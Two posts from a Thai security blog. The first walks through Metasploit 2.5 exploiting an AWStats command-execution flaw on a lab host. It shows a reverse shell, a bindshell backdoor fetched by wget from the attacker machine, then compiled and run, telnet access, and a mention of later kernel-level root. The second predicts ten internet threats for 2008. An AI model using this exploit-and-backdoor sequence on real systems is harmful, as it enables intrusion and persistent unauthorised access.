Saturday, December 15

ความน่าสนใจของ Metasloit

Metasploit เป็นเครื่องมือแบบ open source ที่สามารถใช้เพื่อพัฒนา ทดสอบ และใช้ exploit
# wget http://www.metasploit.com/tools/framework-2.5.tar.gz
--12:48:57-- http://www.metasploit.com/tools/framework-2.5.tar.gz
=> `framework-2.5.tar.gz'
Resolving www.metasploit.com... 66.234.161.200
Connecting to www.metasploit.com|66.234.161.200|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,625,719 (2.5M) [application/x-gzip]

100%[========================================================================================>] 2,625,719 11.23K/s ETA 00:00

12:53:14 (10.05 KB/s) - `framework-2.5.tar.gz' saved [2625719/2625719]

แตกไฟล์โดยใช้คำสั่ง tar
# tar -zxvf framework-2.5.tar.gz
framework-2.5/
framework-2.5/lib/
framework-2.5/lib/Msf/
framework-2.5/lib/Msf/Nop/
framework-2.5/lib/Msf/Nop/OptyNop2.pm
framework-2.5/lib/Msf/Nop/OptyNop2Tables.pm
framework-2.5/lib/Msf/PayloadComponent/
framework-2.5/lib/Msf/PayloadComponent/BSD/
framework-2.5/lib/Msf/PayloadComponent/BSD/ia32/

framework-2.5/extras/Term-ReadLine-Gnu-1.14.tar.gz
framework-2.5/msfcli
framework-2.5/msfweb
framework-2.5/msfpayload

เข้าไปในไดเร็กทอรี framework-2.5
# cd framework-2.5
[root@ca framework-2.5]# ls
data exploits msfcli msfencode msfpescan nops src
docs extras msfconsole msflogdump msfupdate payloads tools
encoders lib msfelfscan msfpayload msfweb sdk

เรียก console
# ./msfconsole


__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.5 [105 exploits - 74 payloads]

พิมพ์ help เพื่อดู option ที่สามารถใช้ได้
msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

แสดง exploit ที่มี
msf > show exploits
Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution

เรียกใช้ exploit ที่โจมตี awstats
msf > use awstats_configdir_exec

msf awstats_configdir_exec(cmd_unix_reverse) > set RHOST 192.168.1.204
RHOST -> 192.168.1.204
msf awstats_configdir_exec(cmd_unix_reverse) > set DIR /cgi-bin/
DIR -> /cgi-bin/
msf awstats_configdir_exec(cmd_unix_reverse) > set LHOST 192.168.1.203
LHOST -> 192.168.1.203
msf awstats_configdir_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321

แสดง option ของ exploit
msf awstats_configdir_exec(cmd_unix_reverse) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------- -----------------------------------
optional SSL Use SSL
required RHOST 192.168.1.204 The target address
optional VHOST The virtual host name of the server
required DIR /cgi-bin/ Directory of awstats.pl script
required RPORT 80 The target port

Payload: Name Default Description
-------- ------ ------------- -----------------------------------
required LHOST 192.168.1.203 Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Targetless Exploit

แสดง payload
msf awstats_configdir_exec > show payloads

Metasploit Framework Usable Payloads
====================================

cmd_generic Arbitrary Command
cmd_irix_bind Irix Inetd Bind Shell
cmd_unix_reverse Unix Telnet Piping Reverse Shell


เซ็ต payload ให้เป็น cmd_unix_reverse
msf awstats_configdir_exec(cmd_generic) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf awstats_configdir_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Establishing a connection to the target...

Trying 192.168.1.203...

Escape character is '^]'.
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.1.203:4321 <-> 192.168.1.204:32796 192.168.1.203:4321 <-> 192.168.1.204:32797

id
uid=48(apache) gid=48(apache) groups=48(apache)
pwd
/usr/local/awstats/wwwroot/cgi-bin


ดาวน์โหลด bindshell.c ซึ่งเป็น backdoor ที่เปิดพอร์ต 4000 ไว้
cd /tmp
wget http://192.168.1.203/bindshell.c
--16:08:20-- http://192.168.1.203/bindshell.c
=> `bindshell.c'
Connecting to 192.168.1.203 ... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,083 [text/plain]

0K .. 100% 135.61 KB/s

16:08:20 (135.61 KB/s) - `bindshell.c' saved [2083/2083]

ls
bindshell.c
ssh-GDMM1551
ssh-dovU4939
gcc -o bindshell bindshell.c
ls
bindshell
bindshell.c
ssh-GDMM1551
ssh-dovU4939
./bindshell
Daemon is starting...OK, pid = 1648

Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.

msf awstats_configdir_exec(cmd_unix_reverse) > exit

telnet เข้าไปที่พอร์ต backdoor
# telnet 192.168.1.204 4000
Trying 192.168.1.204...
Connected to www.sran.net (192.168.1.204).
Escape character is '^]'.
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$ sh-2.05b$ ls -al
total 204
drwxr-xr-x 19 root root 4096 Dec 16 15:18 .
drwxr-xr-x 19 root root 4096 Dec 16 15:18 ..
-rw-r--r-- 1 root root 0 Dec 16 15:18 .autofsck
drwxr-xr-x 2 root root 4096 Nov 28 12:23 bin
drwxr-xr-x 3 root root 4096 Nov 28 10:53 boot
drwxr-xr-x 21 root root 118784 Dec 16 15:19 dev
drwxr-xr-x 47 root root 4096 Dec 16 15:19 etc
drwxr-xr-x 5 root root 4096 Dec 1 11:25 home
drwxr-xr-x 2 root root 4096 Oct 7 2003 initrd
drwxr-xr-x 8 root root 4096 Nov 28 12:22 lib
drwx------ 2 root root 16384 Nov 28 05:45 lost+found
drwxr-xr-x 2 root root 4096 Sep 8 2003 misc
drwxr-xr-x 4 root root 4096 Nov 28 11:12 mnt
drwxr-xr-x 2 root root 4096 Oct 7 2003 opt
dr-xr-xr-x 60 root root 0 Dec 16 10:18 proc
drwxr-x--- 3 root root 4096 Dec 16 13:13 root
drwxr-xr-x 2 root root 8192 Nov 28 12:23 sbin
drwxrwxrwt 4 root root 4096 Dec 16 16:08 tmp
drwxr-xr-x 15 root root 4096 Nov 28 10:50 usr
drwxr-xr-x 18 root root 4096 Nov 28 10:56 var
sh-2.05b$ sh-2.05b$ cd /var/tmp
sh-2.05b$ sh-2.05b$ ls -al
total 8
drwxrwxrwt 2 root root 4096 Dec 15 14:59 .
drwxr-xr-x 18 root root 4096 Nov 28 10:56 ..
sh-2.05b$ sh-2.05b$ uname -a
Linux app.sran.org 2.4.22-1.2115.nptl #1 Wed Oct 29 15:20:17 EST 2003 i586 i586 i386 GNU/Linux



เมื่อได้ user ในระบบเป็น apache แล้วผมจึงพยายามต่อไปเพื่อให้ได้สิทธิ์ของ root การที่ระบบนี้ใช้ Linux kernel เวอร์ชั่นเก่าทำให้ไม่ยากที่จะหา exploit เพื่อโจมตีช่องโหว่ใน kernel และผมก็ได้ root ในที่สุด

นนทวรรธนะ สาระมาน
Nontawattana Saraman
SRAN Dev

Monday, December 3

ทำนาย 10 ภัยคุกคามทางอินเตอร์เน็ท 2008

ใกล้หมดปีไปอีกครั้งแล้วนะครับ ใครตั้งใจจะทำอะไรไว้ ยังไม่ได้ทำภายในปีนี้ก็ขอให้เรียบๆทำกันไว้ เวลานั้นไม่เคยคอยใคร พอใกล้หมดปี ก็มักจะมีคำทำนายในเรื่องต่างๆ เช่นกันในปีหน้า ภัยคุกคามในรูปแบบใหม่ๆ ที่อาจจะเกิดขึ้นในปี 2008 จะเป็นอย่างไรบ้างลองรับฟังกันดูเผื่อไว้ว่าจะช่วยในการป้องกัน กันได้ทัน เท่าที่ผ่านมาได้ค้นหาข้อมูลเกี่ยวกับภัยคุกคามทางอินเตอร์เน็ทในรูปแบบ ใหม่ๆ พบว่ามีหลายสำนักได้ตั้งข้อสังเกตไว้พอสมควร โดยเฉพาะเจ้าแรกที่กล้าออกมาทำนาย นั้นคือ Mcafee ยักษ์ใหญ่ในวงการ IT Security ระดับโลก ในทีมงาน SRAN ก็ได้เขียนทำนายไว้เช่นกัน ซึ่งมีความใกล้เคียงกับทาง Mcafee และคิดว่าในปี 2008 ภัยคุกคาม จะเน้นในเรื่องความเป็นส่วนตัวมากขึ้น ข้อมูลที่เป็นข้อมูลส่วนบุคคล ความประมาทในการใช้งานของ User รวมถึงอาชญากรรมคอมพิวเตอร์ ในรูปแบบต่างๆ ที่ทวีความซับซ้อน จะแบ่งหมวดหมู่ภัยคุกคามได้ดังนี้ครับ
กลุ่มภัยคุกคามที่พบในปี 2008
กลุ่มที่ 1 กองทัพ botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ

กลุ่มที่ 2 ช่องโหว่ของระบบปฏิบัติการ
กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท
กลุ่มที่ 1 กองทัพ Botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ

ภัยคุกคามอันดับที่ 1 Storm Worm : อาชญกรทางคอมพิวเตอร์ จะใช้เทคนิคการสร้าง Storm Worm เพื่อกลบเกลื่อนร่องรอย สร้างสายพันธ์ของ worm ในการเปลี่ยนโค้ดที่ทำให้ระบบซอฟต์แวร์ Anti virus ไม่สามารถตรวจจับได้ ซึงการเกิด Storm Worm นั้นเป็นการติดโปรแกรมไม่พึ่งประสงค์ บนเจตนาของผู้บุกรุกที่สร้างขึ้น โปรแกรมไม่พึ่งสงค์เรียกอีกอย่างหนึ่งว่า “malware” คือซอฟต์แวร์ที่สูญเสีย C (Confidentiality) I (Integrity) และ A (Availability) อย่างใดอย่างหนึ่ง หรือ ทั้งหมด จนทำให้เกิดเป็น Virus , Worm , Trojan , Spyware , Backdoor และ Rootkit ซึ่ง Storm worm เป็นลักษณะการแพร่กระจายสายพันธ์ ที่มีการเปลี่ยนแปลงโค้ด ทำให้เกิดความเสียหายกับเครื่องที่ติด worm เหล่านี้ ผลลัพธ์ของ Storm worm คือเครื่องที่ติด worm ชนิดเหล่านี้จะถูกเรียกว่า “Zombie” ที่พร้อมที่จะควบคุมให้ทำการใดการหนึ่ง เช่น การส่ง Spam , การโจมตีชนิดที่เรียกว่า DDoS/DoS เป็นต้น หาก Zombie จำนวนมากกว่า 1 เครื่อง ก็เรียกว่า Botnet นั้นเอง ในปี 2008 กองทัพ Botnet ที่พร้อมใช้งานจะมีอัตราที่สูงขึ้น และอาจมีการซื้อขาย กองทัพ Botnet ในกลุ่มอาชญกรคอมพิวเตอร์ เพื่อใช้โจมตีเครือข่ายเครือข่ายขนาดใหญ่ ได้ต่อไป

ภัยคุกคามอันดับที่ 2 : Parasitics Malware เป็นไวรัสที่แก้ไขไฟล์ที่อยู่ในดิสก์ และใส่โค้ดเข้าไปในไฟล์ ในปีที่ผ่านมาจะพบว่าผู้เขียนไวรัสจะใช้วิธีนี้สร้างไวรัสชนิดต่างๆ ตัวอย่างเช่น Grum , Virut และ Almanahe คาดว่าจะมี Parasitics Malware เติบโตขึ้นในปี 2008 และการฝั่งโค้ดเข้าไปในไฟล์ จากเดิมเน้นการทำลายเครื่องให้เกิดความผิดปกติ ก็จะทำฝั่งตัวควบคุมเครื่อง อาจเป็น Backdoor , Trojan , หรือ Script บางอย่างที่ทำให้เครื่องติด Parasitic Malware ตกเป็นทาส (Zombie) ได้ซึ่งการเกิด Zombie หลายๆเครื่อง ก็จะกลายเป็นกองทัพ Botnet ที่พร้อมใช้งานในการโจมตีต่อไป

สัดส่วนการเจริญเติบโตจากภัยคุกคามชนิด Parasitics Malware จาก Mcafee

ภัยคุกคามอันดับที่ 3 : การยึดระบบเสมือนจริง (Virtualization) ผู้ สร้าง Malware พยายามค้นหาช่องโฆว่ในระบบ Virtualization มากขึ้นการที่ได้ควบคุมระบบปฏิบัติการเสมือน ในการสร้างกองทัพ Botnet และเพื่อการแพร่กระจายการติดเชื้อแบบ Storm worm ขึ้น ทั้งนี้เพื่อสร้างจำนวน Zombie แบบไร้ตัวตนให้มากขึ้น Virtualization เป็นเทคโนโลยีที่ช่วยให้สามารถแบ่งพาทิชันคอมพิวเตอร์ให้สามารถรันซอฟต์แวร์ และแอพพลิเคชันในจำนวนมากๆ หรือแม้แต่รันระบบปฏิบัติการได้หลายๆ ตัวพร้อมกันซึ่งพื้นที่ที่แบ่งพาทิชันขึ้นนั้นมักรู้จักกันว่า “Virtual Space” หรือ “Container” โดยปัจจุบัน Virtual lization Technology มีการใช้งานกันมากขึ้น

ช่องโหว่ที่ค้นพบบนระบบเสมือน

ภัยคุกคามอันดับที่ 4 FastFlux เป็นเทคนิคทาง DNS ที่ใช้โดย Botnet เพื่อซ่อนเว็บไซต์ที่ทำหน้าที่ให้บริการ Phisihing และมัลแวร์ ที่อยู่เบื้องหลังเครือข่ายของโฮสต์ที่ถูกบุกรุกทำตัวเป็น Proxy ที่มีการเปลี่ยนแปลงตลอดเวลา รวมถึงเครือข่ายแบบ Peer-to-Peer รวมกันหลายเครือข่าย ใช้เทคนิคต่างๆ ได้แก่ การใช้คำสั่งและการควบคุมแบบกระจาย (Distributed) การใช้ Load Balancing และการเปลี่ยนเส้นทาง proxy เพื่อทำให้การเครือข่ายมัลแวร์ยากต่อการถูกตรวจพบและการป้องกัน Storm Worm เป็นหนึ่งในมัลแวร์ที่ใช้เทคนิคเหล่านี้ผู้ใช้อินเทอร์เน็ตอาจพบการใช้ fast flux ในการโจมตี phishing ที่มีเชื่อมโยงกับกลุ่มอาชญากร รวมถึงการโจมตี MySpace ด้วยในปี 2008 นี้

ในปี 2008 อาจมีอาชีพใหม่ ในการค้าขาย กองทัพ botnet ในตลาดอินเตอร์เน็ทก็เป็นได้ ทั้งนี้กองทัพ botnet อาจจะมีมากในประเทศที่พึ่งมีการเชื่อมต่ออินเตอร์เน็ท และระบบเครือข่ายใหม่ๆ ที่ยังขาดการป้องกันภัยที่ดี อีกทั้งจะมีจำนวนมากขึ้นสำหรับประเทศที่ยังไม่มีกฎหมายเอาผิดกับผู้ใช้ botnet ซึ่งผลที่เกิดจากการโจมตีของ Botnet ไม่ใช่แค่เพียงการส่ง Spam , DDoS/DoS , Virus/worm อีกต่อไป แต่เป็นภัยคุกคามอื่น ที่คาดไม่ถึงว่าจะเกิดขึ้นก็เป็นไปได้

จำนวน botnet ในแต่ละวัน

กลุ่มที่ 2 ภัยคุกคามจากช่องโหวที่พบบนระบบปฏิบัติการ ่

ภัยคุกคามอันดับ 5 : Operating System Vulnerability : ระบบปฏิบัติการที่เรารู้จักกันดี ไม่ว่าเป็น Linux / BSD , MaC OS หรือ Windows Microsoft นำไปใช้บน Appliance ต่างๆ รวมไปถึงระบบมือถือ ที่ในปีหน้า 2008 นี้เองจะเห็นว่าคนทั่วไปพกมือถือที่มีมัลติมีเดีย และสามารถท่องโลกอินเตอร์เน็ทได้ สามารถทำอะไรๆ ที่ต้องการได้ ทำงานแทน Notebook ได้ ไม่ว่าเป็นมือถือที่ระบบปฏิบัติการของ Mac ที่ชื่อว่า iPhone หรือพวก Windows Mobile ซึ่งในปีหน้าอาจพบช่องโหว่ต่างๆ ที่เกิดขึ้นบนเครื่องมือถือมากขึ้น ไม่ว่าเป็นพวก Virus/worm, Spam เหล่านี้สร้างความเสียหายไม่น้อยกว่าเครื่อง PC ที่ใช้กันทั่วไป ที่เป็นเช่นนี้ก็เนื่องจาก Application ที่มากขึ้น บนตัวระบบ Operating System ทำให้ภาพรวมการใช้งาน จะพบช่องโหว่มาขึ้นจาก Application มากกว่า OS ก็ตาม หลายคนยังตั้งข้อสังเกตถึงระบบปฏิบัติการใหม่ของ Windows Microsoft ที่ชื่อว่า Vista ที่ยังมีช่องโหว่และไม่ได้รับการแก้ไขให้ทันเวลา ซึ่งจะขยายผลต่อให้เกิดภัยคุกคามใหม่ที่ฝั่งเข้าสู่ระบบ และสร้างเป็น Zombie ต่อไปได้เช่นกัน

กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท

กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท ซึ่งส่วนตัวผมถือว่าเป็นกลุ่มภัยคุกคามประจำปี 2008 เนื่องจากการเจริญเติบโตการใช้งานอินเตอร์เน็ทที่มากขึ้นและความซับซ้อนของ รูปแบบการใช้งาน มีผลให้เกิดอาชญกรรมเกี่ยวกับการขโมยข้อมูลส่วนตัว การนำข้อมูลส่วนตัวมาเผยแพร่ โดยไม่ได้รับอนุญาติ และการหลอกหลวงทางเทคโนโลยีต่างๆ ที่เกี่ยวข้องกับการใช้งาานอินเตอร์เน็ท ส่วนบุคคลมากขึ้นนั่นเอง สรุปว่ากลุ่มนี้ เหยื่อมักเกิดจาก ความรู้เท่าไม่ถึงการณ์ การทำนายภัยคุกคามที่อาจเกิดขึ้นในปี 2008 ในกลุ่มที่ 3 นี้ก็เพื่อป้องกันไม่สิ่งเหล่านี้เกิดกับตนเอง และคนใกล้ตัวให้พึ่งระวังได้

ภัยคุกคามอันดับที่ 6 : ซอฟต์แวร์ไม่พึ่งประสงค์จากการใช้สนทนาออนไลท์ (Instant Malware) เป็นการใช้งานที่ประมาทของผู้ใช้เอง ที่อาจจะดาวโหลดซอฟต์แวร์จาก คู่สนทนาที่ไม่รู้จัก หรือรู้จัก มีไฟล์แนบมา หรือที่พบมากขึ้นคือ ในรูปแบบของ Flash ที่สามารถเอ็กซิคิวท์ตัวเองได้ มาพร้อมกับโปรแกรมประเภท Instant Messaging

ช่องโหว่ที่ค้นพบจากการใช้งาน IM ในแต่ละปี

ภัยคุกคามอันดับที่ 7 : บริการเกมส์ออนไลน์ (Online Gaming) ผู้ใช้บริการอาจตกเป็นเหยื่อ เนื่องจากของในเกมส์สามารถซื้อขายกันเงินจริงๆได้ ตัวอย่างเห็นได้จากโทรจันที่ขโมยรหัสผ่านของบริการเกมส์ออนไลน์ ในปี 2007 จะมีอัตราเติบโตเร็วกว่าจำนวนของโทรจันที่มีเป้าหมายกับผู้ใช้บริการของ ธนาคาร

Powered by Gregarious (42)
ภัยคุกคามอันดับที่ 8 : สังคมออนไลท์แบบเปิด (Social Networking) กับการใช้ข้อมูลบน Web 2.0 เป็นที่รู้กันว่าสังคมแบบเปิดบนโลกอินเตอร์เน็ทมีจำนวนมากขึ้นจากเทคโนโลยี Web 2.0 สิ่งที่ตามมา ผมเคยทำนายไว้ในบท 7 ภัยคุกคามปี 2007 ไปแล้วว่าการควบคุม Social Networking เป็นเรื่องยาก เพื่อเนื้อหาเกิดจากผู้ใช้งานทุกคน ทุกคนมีส่วนร่วมในการสร้างเนื้อบนเว็บไซด์ การควบคุมเรื่องนี้เป็นเรื่องยาก เรามักได้ยินข่าวการโพสเรื่องราวการหมิ่นประมาทสิทธิส่วนบุคคล การกล่าวร้าย การกล่าวเท็จ ปิดเบือนข้อเท็จจริง บน Web 2.0 รวมถึงพวก Web Board อยู่ตลอดทั้งปี ไม่ว่าเป็น Youtube , Camfroge , Myspace.com เป็นต้น หรือแม้เว็บไทยของเราก็มีจำนวนไม่น้อยที่เกิดเรื่องเหล่านี้ การควบคุมทัศนะคติแต่บุคคลที่เข้ามา Post เนื้อหาในเว็บเป็นเรื่องที่ควบคุมลำบาก แต่เป็นเรื่องไม่ยากในการทราบที่มาที่ไปของการ Post สิ่งเหล่านี้ จึงทำให้มีการหลอกหลวงจากความรู้เท่าไม่ถึงการณ์จากการใช้งาน Web 2.0 มากขึ้น และผลการคาดการแล้วพบว่าอาจเกิดมีผู้โจมตีจะใช้เวบไซต์ที่ใช้เทคโนโลยี Web 2.0 เพื่อแพร่กระจายมัลแวร์และรวบรวมข้อมูลต่าง ๆ ที่ต้องการจากเว็บเพื่อค้นหาข้อมูลที่ผู้ใช้แชร์ไว้เพื่อทำให้การโจมตีดู เหมือนจริงมากยิ่งขึ้น

ภัยคุกคามอันดับที่ 9 การหลอกลวงจากการใช้เทคโนโลยี VoIP : ในปีคศ.2007 จำนวนของช่องโหว่ที่รายงานเกี่ยวกับ VoIP มากกว่ารายงานช่องโหว่ในปีคศ.2006 ถึงสองเท่า นอกจากนี้ยังมีรายงานเกี่ยวกับการโจมตีที่เรียกว่า vishing และ phreaking ซึ่งอาจเกิด Spam บน VoIP และการหลอกลวงจาก Botnet ที่เป็นเสียงมากับมือถือโดยใช้เทคนิค (Social Engineering) ได้เช่นกัน

VoIP-Voice Over IP หรือที่เรียกกันว่า “VoIP Gateway” หมายถึง การส่งเสียงบนเครือข่ายไอพี เป็นระบบที่แปลงสัญญาณเสียงในรูปของสัญญาณไฟฟ้ามาเปลี่ยนเป็นสัญญาณดิจิตอล คือ นำข้อมูลเสียงมาบีบอัดและบรรจุลงเป็นแพ็กเก็ต ไอพี (IP) แล้วส่งไปโดยมีเราเตอร์ (Router) ที่เป็นตัวรับสัญญาณแพ็กเก็ต และแก้ปัญหาบางอย่างให้ เช่น การบีบอัดสัญญาณเสียงให้มีขนาดเล็กลง การแก้ปัญหาเมื่อมีบางแพ็กเก็ตสูญหาย หรือได้มาล่าช้า (delay)การสื่อสารผ่านทางเครือข่ายไอพีต้องมีเราเตอร์ (Router) ที่ทำหน้าที่พิเศษเพื่อประกันคุณภาพช่องสัญญาณไอพีนี้ เพื่อให้ข้อมูลไปถึง ปลายทางหรือกลับมาได้อย่างถูกต้องและอาจมีการให้สิทธิพิเศษก่อนแพ็กเก็ตไอพี อื่น (Quality of Service : QoS) เพื่อการให้บริการที่ทำให้เสียงมีคุณภาพ

นอกจากนั้น Voice over IP (VoIP) ยังเป็นการส่งข้อมูลเสียงแบบ 2 ทางบนระบบเครือข่ายแบบ packet-switched IP network. ซึ่งข้อมูลนี้จะถูกส่งผ่านเครือข่ายอินเตอร์เน็ตสาธารณะเพื่อสื่อสารระหว่าง VoIP ด้วยกัน โดยที่ยังคงความเป็นส่วนตัวไว้ได้

เทคโนโลยีนี้ยังใหม่และยังขาดวิธีที่ใช้ในการป้องกัน คาดว่าจะมีการโจมตี VoIP เพิ่มขึ้นร้อลละ 50 ในปีคศ.2008 หรือแม้แต่กระทั่งมัลแวร์ (Malware) ที่โจมตี VoIP แพร่กระจายสู่วงกว้าง

ภัยคุกคามอันดับ 10 :การติดกับดักทางข้อมูล (Information pitfall) เรื่องนี้ผมถือว่าเป็นเรื่องใหญ่ และเคยเขียนบทความเรื่องนี้ในเดือนเมษายน ปี 2007 ที่บอกว่าเป็นเรื่องใหญ่เพราะว่าเป็นการสร้างความเชื่อให้เกิดขึ้นกับบุคคล การสร้างกลยุทธการตลาดเข้ามาเพื่อสร้างภาพ สร้างความเชื่อ หากเป็นความเชื่อที่เป็นสิ่งที่ถูกต้อง และมีคุณธรรม ก็ดีไป แต่หากเป็นการสร้างความเชื่อ เพื่อหลอกหลวง ก็จะทำให้เกิดความเสียหายได้เช่นกัน ตัวอย่างเราจะพบว่า Scam Web , Phishing Web , Adsware ที่ติดมากับ Web ถึงแม้จะจำนวนน้อยลงเพราะคนเริ่มตะหนักถึงภัยคุกคามที่ตามจากเข้าเว็บพวกนี้ แต่ก็ยังมีจำนวนคนไม่น้อยที่ยังตกเป็นเหยื่ออยู่ตลอดทั้งปี สิ่งนี้จะจางหายไปกับกับระบบป้องกันภัยทั้งด้านระบบป้องกันภัยทางเครือข่าย (Network) และระบบป้องกันภัยระดับเครื่องคอมพิวเตอร์ (Host) ที่มีความทันสมัยและฉลาดในวิธีการป้องกันก็ตาม การสร้างค่านิยม บนความเชื่อ ถือว่ามีความเกี่ยวพันกับความมั่นคงของชาติในอนาคต มันอาจเป็นเรื่องพูดได้ยากในขณะนี้ เพราะทุกคน ยินดีต้อนรับเทคโนโลยีที่มาจากต่างประเทศ โดยไม่คิดว่าผลสืบเนื่องในอนาคต ซึ่งอาจนำมาถึงการตกเป็นอนานิคมทางเทคโนโลยี (Information Technology Colonization) โดยยินยอมพร้อมใจก็ได้

ความเชื่อ จากค่านิยม ที่คิดว่าต่างประเทศดีกว่าเรา เป็นเรื่องยากที่แก้ไข แต่ไม่สายที่ดำเนินการ ถึงเวลาที่เราทุกคนต้องสร้างความเชื่อมั่นว่า คนไทยไม่แพ้ไคร ไม่ได้ด้อยไปกว่าใครในโลกนี้

สวัสดีปีใหม่ครับ

นนทวรรธนะ สาระมาน
Nontawattana Saraman